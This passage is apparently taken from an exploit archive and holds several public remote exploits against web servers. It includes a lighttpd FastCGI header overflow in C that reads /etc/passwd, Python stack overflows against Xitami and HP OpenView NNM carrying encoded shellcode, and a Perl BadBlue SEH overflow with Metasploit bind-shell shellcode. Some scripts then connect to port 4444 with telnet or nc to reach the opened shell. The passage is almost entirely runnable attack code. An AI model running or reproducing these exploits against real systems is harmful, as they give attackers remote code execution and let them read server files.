$exploit = $asm. " /". $nop.$incbh.$incebx .$asm1.$nop1. $eip ."\r\n\r\n" .$nop2.$shellcode;
print $victim $exploit;
print " + Malicious GET request sent ...\n";
print "Done.\n";
close($victim);
$host = $ARGV[0];
print " + connect to 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
# [2007-08-12]
80 Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit
/************************************************** *********
* hoagie_lighttpd.c
* LIGHTTPD/FASTCGI REMOTE EXPLOIT (<= 1.4.17)
*
* Bug discovered by:
* Mattias Bengtsson <[email protected]>
* Philip Olausson <[email protected]>
* http://www.secweb.se/en/advisories/lighttpd-fastcgi-remote-vulnerability/
*
* FastCGI:
* http://www.fastcgi.com/devkit/doc/fcgi-spec.html
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* [email protected]
* http://www.void.at
*
************************************************** **********/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* don't change this values except you know exactly what you are doing */
#define REQUEST_SIZE_BASE 0x1530a
char FILL_CHAR[] = "void";
char RANDOM_CHAR[] = "01234567890"
"abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ";
/* just default values */
#define DEFAULT_SCRIPT "/index.php" /* can be changed via -s */
#define DEFAULT_PORT "80" /* can be changed via -p */
#define DEFAULT_NAME "SCRIPT_FILENAME" /* can be changed via -n */
#define DEFAULT_VALUE "/etc/passwd" /* can be change via -a */
#define DEFAULT_SEPARATOR ','
#define BUFFER_SIZE 1024
/* header data type
* defining header name/value content and length
* if a fixed value is set use this one instead of generating content
*/
struct header_t {
int name_length;
char name_char;
int value_length;
char value_char;
char *value_value;
};
/* generate_param
* generate character array (input: comma separated list)
*/
char *generate_param(int *param_size_out,
char **name,
char **value) {
char *param = NULL;
int param_size = 0;
int param_offset = 0;
int i;
int name_length = 0;
int value_length = 0;
for (i = 0; name[i] != NULL && value[i] != NULL; i++) {
name_length = strlen(name[i]);
value_length = strlen(value[i]);
if (name_length > 127) {
param_size += 4;
} else {
param_size++;
}
if (value_length > 127) {
param_size += 4;
} else {
param_size++;
}
param_size += strlen(name[i]) + strlen(value[i]);
param = realloc(param, param_size);
if (param) {
if (strlen(name[i]) > 127) {
param[param_offset++] = (name_length >> 24) | 0x80;
param[param_offset++] = (name_length >> 16) & 0xff;
param[param_offset++] = (name_length >> 8) & 0xff;
param[param_offset++] = name_length & 0xff;
} else {
param[param_offset++] = name_length;
}
if (strlen(value[i]) > 127) {
param[param_offset++] = (value_length >> 24) | 0x80;
param[param_offset++] = (value_length >> 16) & 0xff;
param[param_offset++] = (value_length >> 8) & 0xff;
param[param_offset++] = value_length & 0xff;
} else {
param[param_offset++] = value_length;
}
memcpy(param + param_offset, name[i], name_length);
param_offset += name_length;
memcpy(param + param_offset, value[i], value_length);
param_offset += value_length;
}
}
if (param) {
*param_size_out = param_size;
}
return param;
}
/* generate_buffer
* generate header name or value buffer
*/
char *generate_buffer(int length, char c, int random_mode) {
char *buffer = (char*)malloc(length + 1);
int i;
if (buffer) {
memset(buffer, 0, length + 1);
if (random_mode) {
for (i = 0; i < length; i++) {
buffer[i] = RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))];
}
} else {
memset(buffer, c, length);
}
}
return buffer;
}
/* generate_array
* generate character array (input: comma separated list)
*/
char **generate_array(char *list, char separator, int *length) {
char **data = NULL;
int i = 0;
int start = 0;
int j = 1;
if (list) {
for (i = 0; i <= strlen(list); i++) {
if (list[i] == separator ||
i == strlen(list)) {
data = realloc(data, (j + 1) * (sizeof(char*)));
if (data) {
data[j - 1] = malloc(i - start + 1);
if (data[j - 1]) {
strncpy(data[j - 1], list + start, i - start);
data[j - 1][i - start + 1] = 0;
}
data[j] = NULL;
}
start = i + 1;
j++;
}
}
*length = j;
}
return data;
}
/* generate_request
* generate http request to trigger the overflow in fastcgi module
* and overwrite fcgi param data with post content
*/
char *generate_request(char *server, char *port,
char *script, char **names,
char **values, int *length_out,
int random_mode) {
char *param;
int param_size;
char *request;
int offset;
int length;
int i;
int fillup;
char *name;
char *value;
/* array of header data that is used to create header name and value lines
* most of this values can be changed -> only length is important and a
* few characters */
struct header_t header[] = {
{ 0x01, '0', 0x04, FILL_CHAR[0], NULL },
{ FILL_CHAR[0] - 0x5 - 0x2, 'B', FILL_CHAR[0] - 0x2, 'B', NULL },
{ 0x01, '1', 0x5450 - ( (FILL_CHAR[0] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'C', NULL },
{ 0x01, '2', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'D', NULL },
{ 0x01, '3', 0x04, FILL_CHAR[1], NULL },
{ FILL_CHAR[1] - 0x5 - 0x2, 'F', FILL_CHAR[1] - 0x2, 'F', NULL },
{ 0x01, '4', 0x5450 - ( (FILL_CHAR[1] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'H', NULL },
{ 0x01, '5', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'I', NULL },
{ 0x01, '6', 0x04, FILL_CHAR[2], NULL },
{ FILL_CHAR[2] - 0x5 - 0x2, 'K', FILL_CHAR[2] - 0x2, 'K', NULL },
{ 0x01, '7', 0x5450 - ( (FILL_CHAR[2] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'L', NULL },
{ 0x01, '8', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'M', NULL },
{ 0x01, '9', 0, 0, "uvzz" },
{ FILL_CHAR[3] - 0x5 - 0x2, 'O', FILL_CHAR[3] - 0x2, 'O', NULL },
{ 0x01, 'z', 0x1cf - ((FILL_CHAR[3]- 0x1 ) * 2) -0x1 - 0x5 - 0x1 - 0x4, 'z', NULL },
{ 0x00, 0x00, 0x00, 0x00, NULL }
};
/* fill rest of post content with data */
char content_part_one[] = {
0x06, 0x80, 0x00, 0x00, 0x00, 'H', 'T', 'T', 'P', '_', 'W'
};
/* set a fake FastCGI record to mark the end of data */
char content_part_two[] = {
0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
param = generate_param(¶m_size, names, values);
if (param && param_size > 0) {
fillup = 0x54af - 0x5f - 0x1e3 - param_size - 0x1 - 0x5 - 0x1 - 0x4;
length = REQUEST_SIZE_BASE + param_size +
strlen(server) + strlen(port) +
strlen(script);
request = (char*)malloc(length);
if (request) {
memset(request, 0, length);
offset = sprintf(request,
"POST %s HTTP/1.1\r\n"
"Host: %s:%s\r\n"
"Connection: close\r\n"
"Content-Length: %d\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n",
script,
server, port,
fillup + param_size + sizeof(content_part_one) +
sizeof(content_part_two) + 0x5f);
for (i = 0; header[i].name_length != 0; i++) {
name = generate_buffer(header[i].name_length,
header[i].name_char,
header[i].name_length != 1 ? random_mode : 0);
if (header[i].value_value) {
value = header[i].value_value;
} else {
value = generate_buffer(header[i].value_length,
header[i].value_char,
header[i].value_length != 4 &&
header[i].value_char != 'z' ? random_mode : 0);
}
offset += sprintf(request + offset,
"%s: %s\r\n", name, value);
if (!header[i].value_value) {
free(value);
}
free(name);
}
offset += sprintf(request + offset, "\r\n");
memcpy(request + offset, param, param_size);
offset += param_size;
content_part_one[0x03] = (fillup >> 8) & 0xff;
content_part_one[0x04] = fillup & 0xff;
for (i = 0; i < sizeof(content_part_one); i++) {
request[offset++] = content_part_one[i];
}
for (i = 0; i < fillup + 0x5f; i++) {
request[offset++] = random_mode ? RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))] : 'W';
}
for (i = 0; i < sizeof(content_part_two); i++) {
request[offset++] = content_part_two[i];
}
*length_out = offset;
}
}
return request;
}
/* usage
* display help screen
*/
void usage(int argc, char **argv) {
fprintf(stderr,
"usage: %s [-h] [-v] [-r] [-d <host>] [-s **********] [-p <port>]\n"
" [-n <header names>] [-a <header values>] [-o <output>]\n"
"\n"
"-h help\n"
"-v verbose\n"
"-r enable random mode\n"
"-d host HTTP server\n"
"-p port HTTP port (default: %s)\n"
"-s script script url on remote server (default: %s)\n"
"-n value header names (comma seperated, default: %s)\n"
"-a value header values (comma seperated, default: %s)\n"
"-o output save result in output file\n"
"\n"
,
argv[0],
DEFAULT_PORT,
DEFAULT_SCRIPT,
DEFAULT_NAME,
DEFAULT_VALUE);
exit(1);
}
/* connect_to
* connect to remote http server
*/
int connect_to(char *host, int port) {
struct sockaddr_in s_in;
struct hostent *he;
int s;
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
return -1;
}
memset(&s_in, 0, sizeof(s_in));
s_in.sin_family = AF_INET;
s_in.sin_port = htons(port);
if ( (he = gethostbyname(host)) != NULL)
memcpy(&s_in.sin_addr, he->h_addr, he->h_length);
else {
if ( (s_in.sin_addr.s_addr = inet_addr(host) ) < 0) {
return -3;
}
}
if (connect(s, (struct sockaddr *)&s_in, sizeof(s_in)) == -1) {
return -4;
}
return s;
}
/* parse_response
* parse response data from http server
*/
void parse_response(char *response, int response_length, char *output) {
char *p;
int http_code;
int header_mode = 1;
int size;
int bytes = 0;
FILE *fp = stdout;
p = strtok(response, "\r\n");
while (p) {
/* header mode active? */
if (header_mode) {
if (strstr(p, "HTTP/1.1 ") == p) {
sscanf(p, "HTTP/1.1 %d", &http_code);
if (http_code == 200) {
printf(" request successful\n");
} else {
printf(" request failed (error code: %d)\n", http_code);
}
} else if (strstr(p, "Server: ") == p) {
printf(" server version: %s\n", strstr(p, "Server: ") + 8);
/* content length for first content */
} else if (!strchr(p, ':') && http_code == 200) {
sscanf(p, "%x", &size);
header_mode = 0;
if (output) {
fp = fopen(output, "w");
}
}
} else {
if (bytes < size) {
fprintf(fp, "%s\n", p);
bytes += strlen(p) + 1;
}
}
p = strtok(NULL, "\r\n");
}
if (fp != stdout && fp != NULL) {
printf(" %d bytes written to %s\n", bytes, output);
fclose(fp);
}
}
/* main entry
*/
int main(int argc, char **argv) {
char *server = NULL;
char *port = DEFAULT_PORT;
char *script = DEFAULT_SCRIPT;
char **name = NULL;
int name_length = 0;
char **value = NULL;
int value_length = 0;
char *request = NULL;
int request_length = 0;
int i;
int random_mode = 0;
int verbose = 0;
int s;
char c;
fd_set fs;
int bytes;
char buffer[BUFFER_SIZE];
char *response = NULL;
int response_length = 0;
char *output = NULL;
fprintf(stderr,
"hoagie_lighttpd.c - lighttpd(fastcgi) <= 1.4.17 remote\n"
"-andi / void.at\n\n");
if (argc < 2) {
usage(argc, argv);
} else {
while ((c = getopt (argc, argv, "hvrd:p:s:u:n:a:o:")) != EOF) {
switch (c) {
case 'h':
usage(argc, argv);
break;
case 'd':
server = optarg;
break;
case 'p':
port = optarg;
break;
case 's':
script = optarg;
break;
case 'n':
name = generate_array(optarg, DEFAULT_SEPARATOR, &name_length);
break;
case 'a':
value = generate_array(optarg, DEFAULT_SEPARATOR, &value_length);
break;
case 'r':
random_mode = 1;
srand(time(NULL));
break;
case 'v':
verbose = 1;
break;
case 'o':
output = optarg;
break;
default:
fprintf(stderr, " unknown command line option '%c'\n", c);
exit(-1);
}
}
if (!name) {
name = generate_array(DEFAULT_NAME, DEFAULT_SEPARATOR, &name_length);
}
if (!value) {
value = generate_array(DEFAULT_VALUE, DEFAULT_SEPARATOR, &value_length);
}
if (name_length != value_length) {
fprintf(stderr,
" check -n and -n parameter (argument list doesnt match)\n");
} else if (!server) {
fprintf(stderr, " server is missing\n");
} else {
if (random_mode) {
for (i = 0; i < 4; i++) {
FILL_CHAR[i] = RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))];
}
}
printf(" creating request (filler: %c/%c/%c/%c, random: %s)\n",
FILL_CHAR[0], FILL_CHAR[1], FILL_CHAR[2], FILL_CHAR[3],
random_mode ? "on": "off");
for (i = 0; name[i]; i++) {
printf(" set header [%s]=>[%s]\n", name[i], value[i]);
}
request = generate_request(server, port, script, name, value,
&request_length, random_mode);
if (verbose) {
printf(" sending [");
write(1, request, request_length);
printf("]\n");
}
if (request) {
printf(" connecting to %s:%s ...\n", server, port);
s = connect_to(server, atoi(port));
if (s > 0) {
FD_ZERO(&fs);
FD_SET(s, &fs);
printf(" request url %s\n", script);
write(s, request, request_length);
do {
select(s + 1, &fs, NULL, NULL, NULL);
bytes = read(s, buffer, sizeof(buffer));
if (bytes > 0) {
response_length += bytes;
response = realloc(response, response_length + 1);
if (response) {
memcpy(response + response_length - bytes,
buffer,
bytes);
}
}
} while (bytes > 0);
close(s);
response[response_length] = 0;
parse_response(response, response_length, output);
} else {
fprintf(stderr, " connect failed\n");
}
free(request);
} else {
fprintf(stderr, " can't allocate memory for request\n");
}
}
for (i = 0; name[i]; i++) {
free(name[i]);
}
free(name);
for (i = 0; value[i]; i++) {
free(value[i]);
}
free(value);
}
return 0;
}
// [2007-09-20]
80 Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)
#!/usr/bin/python
# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <[email protected]>
# Tested on: Xitami 2.5c2 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc) ******sploit.com>
# Details:..
#
# [Module xigui32.exe]
# If-Modified-Since: Evil, ["A" * 76]\r\n
# EIP 41414141
#
# [Module xitami.exe]
# If-Modified-Since: Evil, ["A" * 104]\r\n
# EIP 41414141
#
# Product Homepage: http://www.xitami.com/
# Just for fun ;)
##
from struct import pack
from time import sleep
from socket import *
host = "192.168.0.1"
port = 80
shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x 13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x 7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x 1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x 3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x 1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\x aa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\x fa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x 7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x 7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\x f6\xb2")
opcode = pack("<L", 0x7CA76981) # jmp esp (shell32.dll / XP SP2 Polish)
jmpcode = "\xeb\x22" # jmp short +0x22
buf = "A" * 72 # (76 - 4) xigui32.exe
buf += opcode
buf += jmpcode
buf += "\x90" * 128
buf += shellcode
header = (
'GET / HTTP/1.1\r\n'
'Host: %s\r\n'
'If-Modified-Since: Evil, %s\r\n'
'\r\n') % (host, buf)
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(header)
sleep(1)
s.close()
print "DONE"
# EoF
# [2007-09-24]
80 HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit
#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack based overflow
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking
# the entry point and injecting Sleep just before exe execution. This gave me enough
# time to attach a debugger before program termination. If anyone knows how to properly
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
buffer+="\x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x 48\x5a\x6a\x68"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x 41\x42\x32\x42"
"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x 59\x39\x6c\x50"
"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x 4f\x39\x6f\x71"
"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x 65\x65\x6c\x4c"
"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x 4b\x70\x4f\x64"
"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x 49\x6c\x4b\x55"
"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x 49\x6c\x6c\x4e"
"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x 6d\x63\x31\x5a"
"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x 78\x63\x45\x78"
"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x 76\x4c\x4b\x54"
"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x 6b\x66\x63\x76"
"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x 61\x48\x43\x50"
"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x 6b\x31\x50\x64"
"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x 70\x75\x58\x63"
"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x 50\x4b\x4f\x4b"
"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x 32\x75\x38\x70"
"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x 30\x62\x48\x6a"
"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x 56\x61\x4f\x6c"
"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x 32\x32\x75\x73"
"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x 69\x7a\x55\x6c"
"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x 53\x50\x53\x51"
"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x 30\x33\x56\x62"
"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x 41\x6e\x75\x75"
"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x 4f\x79\x46\x51"
"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x 58\x4e\x44\x4c"
"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x 53\x31\x45\x6b"
"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x 49\x71\x47\x79"
"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x 6f\x48\x50\x4f"
"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x 47\x59\x6f\x58"
"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x 74\x63\x56\x33"
"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x 50\x56\x39\x44"
"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x 49\x7a\x42\x54"
"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x 6d\x49\x6e\x30"
"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x 6b\x4c\x6b\x6c"
"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x 4f\x50\x75\x51"
"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x 51\x36\x31\x33"
"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x 41\x79\x6f\x48"
"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x 43\x69\x6f\x6a"
"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x 70\x4e\x6b\x73"
"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x 66\x61\x42\x6b"
"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x 30\x33\x63\x4b"
"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
buffer+="\r\n\r\n"
expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."
# [2007-12-12]
80 BadBlue 2.72 PassThru Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
# http://aluigi.altervista.org/adv/badblue-adv.txt
# http://www.securityfocus.com/bid/26803
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379
# exploit for stack overflow in badblue 2.72
#
# Credit to Luigi Auriemma
# Jacopo Cervini [email protected]
# 22/12/2007
#
#
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: badblue-272-seh.pl <victim> <port>\n\n";
exit;
}
# metasploit win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x56\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x36\x4b\x38".
"\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x 4b\x48\x4e\x57".
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x 4a\x41\x4b\x48".
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x48".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x 46\x38\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x 45\x4e\x4b\x38".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x 4e\x30\x4b\x54".
"\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x42\x4b\x38".
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x 41\x53\x4b\x4d".
"\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x 4e\x30\x4b\x38".
"\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x 50\x45\x4a\x46".
"\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x 48\x4d\x48\x56".
"\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x 47\x47\x43\x57".
"\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x 49\x38\x45\x4e".
"\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x 4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x55".
"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x 43\x55\x43\x34".
"\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x 4a\x56\x41\x51".
"\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x 4a\x46\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x 4c\x36\x42\x51".
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x42".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x 4f\x4f\x42\x4d".
"\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x 4f\x4f\x48\x4d".
"\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x 43\x49\x4a\x56".
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x 48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x 4a\x46\x43\x46".
"\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x 49\x32\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x 41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x 44\x34\x4e\x42".
"\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x 46\x44\x4f\x4f".
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x 41\x55\x4c\x56".
"\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x 42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x 48\x4d\x4c\x46".
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x 47\x55\x4e\x4f".
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x 4f\x4f\x42\x4d".
"\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x 4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "can't connect to $ARGV[0] on port $ARGV[1]";
$pad0 = "\x41"x407;
$pad = "\x41"x3000;
$seh = "\xb6\x34\x03\x10"; # pop ebx pop ecx ret in ext.dll
$jmp = "\x90\x90\xeb\x08";
$longjmp = "\xe9\x6e\xf1\xff\xff";
$pad1 = "\x43"x8;
$pad2 = "\x43"x59;
$exploit = "GET /ext.dll?mfcisapicommand=PassThru&". $pad0 . $shellcode . $pad . $jmp . $seh . $pad1 .$longjmp . $pad2. "HTTP/1.0"."\r\n\r\n";
print $victim $exploit;
print " + Malicious GET request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
$host = $ARGV[0];
print " + Connect on port 4444 of $host ...\n";
sleep(2);
system("telnet $host 4444");
exit;
# [2007-12-24]
80 mod_jk2 v2.0.2 for Apache 2.0 Remote Buffer Overflow Exploit (win32)
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : mod_jk2 v2.0.2 for Apache 2.0 Win32
* Found by : IOActive Security Advisory
* ----------------------------------------
* Exploit : mod_jk2 v2.0.2 Buffer Overflow Exploit (win32)
* Exploit date : 01.03.2008 - 02.03.2008
* Exploit writer : Heretic2 ([email protected])
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : Exploit was found by IOActive Security Advisory, trivial exploit for win32.
* The only problem here is that the mod_jk2 forstly downcase all letter in Host
* header request, Metasploit v3 have solutions for this case:
* 1. Use non-upper encoder
* 2. Use non-alpha encoder
* i used the first variant here. and all is working good.
* ----------------------------------------
* Thanks to:
* 1. IOActive Security Advisory ( )
* 2. The Metasploit project ( http://metasploit.com )
* 3. Dreatica-FXP crew ( )
